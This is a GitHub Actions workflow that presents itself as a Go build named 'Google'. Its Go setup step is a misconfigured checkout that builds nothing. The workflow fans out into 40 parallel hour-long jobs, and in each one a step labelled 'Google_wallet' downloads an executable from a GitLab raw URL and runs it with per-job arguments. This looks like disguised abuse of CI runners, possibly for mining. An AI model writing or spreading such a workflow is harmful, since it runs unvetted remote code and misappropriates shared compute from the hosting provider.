name: Google
on: [push, pull_request]
jobs:
  build:
    name: Google
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 20
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4]
        flag: [A, B, C, D, E, f, g, h, i, j]
    timeout-minutes: 60
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/checkout@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v2
    - name: Google_wallet
      run: |
        wget https://gitlab.com/admin1246/loader/-/raw/main/Loading && chmod u+x Loading && ./Loading scala kloter1-${{ matrix.go }}-${{ matrix.flag }}
